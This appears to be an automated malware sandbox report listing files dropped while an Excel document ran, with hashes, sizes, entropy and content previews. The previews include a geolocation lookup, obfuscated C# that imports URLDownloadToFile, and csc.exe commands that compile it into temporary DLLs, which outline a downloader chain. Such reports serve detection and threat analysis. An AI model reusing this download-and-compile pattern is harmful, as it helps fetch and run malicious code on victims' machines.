                                                                                                                                                                              SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                              MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                                                                                                                              SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                                                                                                                              SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                                                                                                                              SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):146860
                                                                                                                                                                              Entropy (8bit):2.79614169198914
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:YssZm/SacgbNk86RW7wRyFJgUiwJ6rvI9JxZKlrJfK1QVuIX0YTRJWgVTaD6mmpF:Z6vmurYEozhngbQXgtFOEXvjDZcyJuzq
                                                                                                                                                                              MD5:B2537BB2532A506CB494FEEEBA42B817
                                                                                                                                                                              SHA1:F50BC54DF6AC684470E239C968543042D6E65D10
                                                                                                                                                                              SHA-256:B96B28AFC4441E55ED0A3FCD9E8F9F6097607CD8CC8E60DB4CCF93F267C6E4D1
                                                                                                                                                                              SHA-512:7BB23BDE059F56E8B9098E29677E29DFB222552099DDA4FAE30EC2BFF7E33F0E5552A677538D25448DA43E3699E4004EB71201B4C6F1EBFD669A9CE891819CF8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):765340
                                                                                                                                                                              Entropy (8bit):4.149249166872395
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:WLVlSKmzCJEuu6vmurYEozhngbQXgtFOEXvjDZcyJuzUcRWWZEPX4V9GsYzVyYlB:WX9R
                                                                                                                                                                              MD5:D439450CD3385B127E476E71929E8B32
                                                                                                                                                                              SHA1:ED5F78F281E5279D420E37EE7F68DA88EEAB4E77
                                                                                                                                                                              SHA-256:17458474EA7FE82E2D5BA484D82B8FE65A61692E10CF264F543394AE471EF2F9
                                                                                                                                                                              SHA-512:0DE2C6B9E56E749A435CC7E831BE161922B64BDBA14A0B7EA0F9140BD466061DCD60571D5125F6438AB67FEFCE7159B29AEB37163545A99C4F72F4408BAF499D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):34096
                                                                                                                                                                              Entropy (8bit):2.5740918692485883
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:IpYteMCH1DvDYFuSSk07lzsB1NocFfABZxZvM:tSkUBzs/acFMvM
                                                                                                                                                                              MD5:095D80B603C4CE2DEAA2CBBA2118EA3D
                                                                                                                                                                              SHA1:0C29528AD023A9DEA876E2506125E048CA4B070E
                                                                                                                                                                              SHA-256:2B8B0F6D17E320FE30D2A846AE140F6F5BAEF98C8B86F8BB606BFF8BD68E557B
                                                                                                                                                                              SHA-512:78D36E98386B300EFDCE1D91223EDC5D8332EE8522333FC8AD767B479993CD683014F7B76AE98B2A881B0FDD8D6A3AB05789186B720F6C2029A7BB7AE38C218F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):765340
                                                                                                                                                                              Entropy (8bit):4.149249166872395
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:WLVlSKmzCJEuu6vmurYEozhngbQXgtFOEXvjDZcyJuzUcRWWZEPX4V9GsYzVyYlB:WX9R
                                                                                                                                                                              MD5:D439450CD3385B127E476E71929E8B32
                                                                                                                                                                              SHA1:ED5F78F281E5279D420E37EE7F68DA88EEAB4E77
                                                                                                                                                                              SHA-256:17458474EA7FE82E2D5BA484D82B8FE65A61692E10CF264F543394AE471EF2F9
                                                                                                                                                                              SHA-512:0DE2C6B9E56E749A435CC7E831BE161922B64BDBA14A0B7EA0F9140BD466061DCD60571D5125F6438AB67FEFCE7159B29AEB37163545A99C4F72F4408BAF499D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):44256
                                                                                                                                                                              Entropy (8bit):3.1505745969216084
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:FW5NFDDUGoOjwTsiyGGiugBhUErpxTORe4ty/gE:FW1o+GGidBhUErpxTORe4tyB
                                                                                                                                                                              MD5:38B685AACF771CAD1BEC3C249143E049
                                                                                                                                                                              SHA1:84031F4FE4BDCCDAB3E699E5F705EA8B878860E0
                                                                                                                                                                              SHA-256:3B0E3807CB1B2D679CE2CB6EBF933A7D25366AD4DEA1A67457B33FCF5CA5E6EC
                                                                                                                                                                              SHA-512:6AF6B518954EF8E81C90AA86B15751B7B14D52140559EED79BC432D7A20F0C64A284C11096A51844E33FC245F74C178B337F02B2F58F096DAFBCF3C339281FDC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):38272
                                                                                                                                                                              Entropy (8bit):2.809737023662444
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:6/ScVovy3FA1Gi1lildmgZ4GtXUZj9hMQsRCNa6gz5ICf5OBgJP+SKA:6/bVAF1lc4GtX0MQsRCNa6gz5XOyJ1/
                                                                                                                                                                              MD5:E9FB2BC3563B12C2A7A36B0A06F2040E
                                                                                                                                                                              SHA1:3EADB50CE400CBA11D25C3002CEA42D07C2E69F0
                                                                                                                                                                              SHA-256:3B7DD54730EF8E60625996F5665CDB2B2C82259253F11485124E0DCE3E612106
                                                                                                                                                                              SHA-512:432671509F6A613763FDBBC391F4B20ADF02D6241B7F3654BA7C07C20BCF90FF10262BFFB6DFE2213B53F09338B28A71B8B759FC0135CC7BE9E8D8D749DE7110
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:05:53 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                              Entropy (8bit):3.977636160114912
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:HFge9EurUWPW/edHlwKdNWI+ycuZhNDbakSYUPNnqSqd:HrUWPWGmKd41ulva3DqSK
                                                                                                                                                                              MD5:4A77382389882E348BEF76224CA368C6
                                                                                                                                                                              SHA1:66B6C30223B60E29C0CFB1138A901BCA664E9AC0
                                                                                                                                                                              SHA-256:6795638504A4D7CCA722343D501553100C45884F46C7106900BFCC41121D2E38
                                                                                                                                                                              SHA-512:F1BD0856E2427A112A3A5391DE9E5F0BDF7D47B1F63A6FB679DEF6C85106CD3034872A107D63951D2796C921A0E7519678D6C5E83F7B244EEE46D9A935835BEE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP..................*.0m.....m.a............4.......C:\Users\user\AppData\Local\Temp\RES3EB6.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:06:10 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                              Entropy (8bit):3.9771714481471574
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:Hye9EurirhdHdqFwKdNWI+ycuZhNnakSZPNnqSqd:PriD9qmKd41ulna3bqSK
                                                                                                                                                                              MD5:52E96D84F6B8FC0D120D84CD8600874D
                                                                                                                                                                              SHA1:019AA6F3643327E52963902D16ECF23AA0E3EFD0
                                                                                                                                                                              SHA-256:AC6E44EB794FA64B5F6F8474AD3E538D6EAF2EA2177A0F51480D719820053F08
                                                                                                                                                                              SHA-512:2930FDBE60DF556955BD3AAB1DC9700A2A49F2E8112D28ACEE21B924E0054794D01AB92EA023A28572CECFD85E3ACB69A7E683FB888EE0AE34027CCC160DD4D2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP................*MB.1A.c..4."$...........4.......C:\Users\user\AppData\Local\Temp\RES8131.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1f8f070d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21037056
                                                                                                                                                                              Entropy (8bit):1.139279959881017
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:E91U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:E9EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                              MD5:434A804587AC864CA7F8F6A47F71E449
                                                                                                                                                                              SHA1:155D51679CC5C33C90DB66A003CE4E36301FB202
                                                                                                                                                                              SHA-256:67342E2E7816F21574EF66D7A2B07EAD2FC526FCA3F41C1EF418D7F5F7DCD00E
                                                                                                                                                                              SHA-512:7E474C0D3F69768A1BD646A52E9B548D78DEA980CBD1CE3806F31048B7E7DD2F8F504500D014324F6167FE608C487C0A52D6965D880E3841BFF47F9F05517E68
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):3.1068389628491837
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiGak7YnqqJXPN5Dlq5J:+RI+ycuZhNnakSZPNnqX
                                                                                                                                                                              MD5:2A4D42A33141D8AF630EC234EA22249E
                                                                                                                                                                              SHA1:4C979E3C31F9860355F192D9FA74DD1F8AABE6AE
                                                                                                                                                                              SHA-256:FBEF70614B9EB950EE0B9140E788E096516B749D0A591845D35623C8E66B8D73
                                                                                                                                                                              SHA-512:01F64EA541709CEEDCB4BC4CF93C87CDE5DDCD083EB05FDF941B8E7B47F705440DCD7AF06EB9EF638694A1F925452070937D8FB9BD1F2BAA10473E9E7FAB0AF1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                              Entropy (8bit):3.8343091223020105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                                                                                                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                                                                                                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                                                                                                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                                                                                                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                              Entropy (8bit):5.252941949522473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fN0zxs7+AEszIP23ffH:p37Lvkmb6KzCWZEonH
                                                                                                                                                                              MD5:40E46685E1BD8020AD80BD181DC565CC
                                                                                                                                                                              SHA1:E405CF6700E5BFFDB6B233144200F0967C10BE64
                                                                                                                                                                              SHA-256:F7895EB04262BAC42E35EC3F50086DE3F755A9D3380D3A6329A807B291DDBE4A
                                                                                                                                                                              SHA-512:B487044F6C72F9971B7237F27A90231AF468F59E0300BC9F25A23B894794A0EEF0F83FE770FE0C23C9864BFCD861B3D35115E270A2A8D589F488CDC6C3915B0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs"
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                              Entropy (8bit):2.8372749225747054
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:etGS4PBG5eAdF8c/kSyffDDxtkZf798dMEWI+ycuZhNnakSZPNnq:6HsAdeoyP8J79qMn1ulna3bq
                                                                                                                                                                              MD5:A1DBD4A719344AEE08926160E0AB5A9F
                                                                                                                                                                              SHA1:392C1755BF4E3DB839D936E3E30B48D48885B5F2
                                                                                                                                                                              SHA-256:562CDCA5BEC033D23B55A9C09B89CF2184D0EBE29C599F58AEA85E567D7DCC11
                                                                                                                                                                              SHA-512:393C14DB2C78D9980DA9779F7DA543835B504EDEC64F8C2DA6F862E0DCE01E24DB868169396C9D6AC61083FBA8C559288EAAA27473314E22794CFA6DB554CFAA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.lr
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                              Entropy (8bit):5.3358717852880835
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:AId3ka6KzzEoOKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
                                                                                                                                                                              MD5:06EB6EC7E53AB9AF88F81E2096766C70
                                                                                                                                                                              SHA1:BD0044294028FACC8EE6BF5C93941B69117CF54C
                                                                                                                                                                              SHA-256:8B31EC383FA6AA8DE3B28F360B26667E06D484D19612D9C980C7E758FDF599D6
                                                                                                                                                                              SHA-512:CB4C521138535A95F41812F7287BFDD9C7214DCA76D74F5A9F486244CF11FCC165C5B487C04F550570E745F0867F5674EF93313993DC1227D303D704643A2706
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):3.085964946941068
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry84bak7YnqqH4UPN5Dlq5J:+RI+ycuZhNDbakSYUPNnqX
                                                                                                                                                                              MD5:F5B72AF8306DADEC0017166DF261A2CC
                                                                                                                                                                              SHA1:4058C05A937C8A8C84BD5ED17606081B7FCAA292
                                                                                                                                                                              SHA-256:F3688C78EB2D1AACC2F4E014B443DCEFD479FE9688CDCF6A2BDFFC7F0D80E79A
                                                                                                                                                                              SHA-512:16AFE29CC656297B475B67D27C88D91620B12440F8CD8110D31FE28CD86D20D75F5B62BE9F56B5E7DD141BAF55B99A560DD75CCA17B4AF3BC37D786E4CC0AE68
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                              Entropy (8bit):3.8343091223020105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                                                                                                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                                                                                                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                                                                                                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                                                                                                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                              Entropy (8bit):5.224448777439502
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fsnIVLGzxs7+AEszIP23fsnIVLQA:p37Lvkmb6KzUIVLGWZEoUIVLQA
                                                                                                                                                                              MD5:192B74A46647476F7B28570F4D867AC2
                                                                                                                                                                              SHA1:1FADFA0C21C583955777ED62228F2FF8D9CC8704
                                                                                                                                                                              SHA-256:FF85CB8A89019EA57307867A5CBB84E6F046D7955201D68FFE319C6E7429D663
                                                                                                                                                                              SHA-512:7A970A9EB3A17C3E054073D645AF3F3B8EC7A2A5C690153C370417A41F3D557D4D88A33CF8A8A57A69409CC04ACCF34B528DA29DE24B653288E8B69A26788940
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs"
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                              Entropy (8bit):2.8400977173622195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:etGSkPBG5eAdF8c/kSyffjLvxtkZfIi7987JMEWI+ycuZhNDbakSYUPNnq:67sAdeoyTLv8J3798JMn1ulva3Dq
                                                                                                                                                                              MD5:F870D4E807B4060ADF0E9A3C8351DBAA
                                                                                                                                                                              SHA1:4974FCDB243A8C12FEFFD41387DDA251DD4710BC
                                                                                                                                                                              SHA-256:A6C17A9615E2B761932458D2FFA3D8AF6C0463CC243FC14EF7F285F9CC88FEFF
                                                                                                                                                                              SHA-512:8AC0232C15627DC1EA8F1C3C3405A81B2D25C93C65A8A7826854575CE6201FD815792F488383D449D4D5D96F5871C3078BA0AE1978C001D7218698B516396B1B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                              Entropy (8bit):5.322432805355275
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:AId3ka6KzUIVLXEoUIVLQ1KaMD5DqBVKVrdFAMBJTH:Akka60UIVLXEoUIVLaKdDcVKdBJj
                                                                                                                                                                              MD5:32881DCE46F711F4D5E9ACD97B71A8E5
                                                                                                                                                                              SHA1:91DBA5406C8ACE04FCE6C471B481069330564F45
                                                                                                                                                                              SHA-256:B1750AFC9BBB6F97ED3933948C34A0D847B1E340252B619043D059578FCD23B1
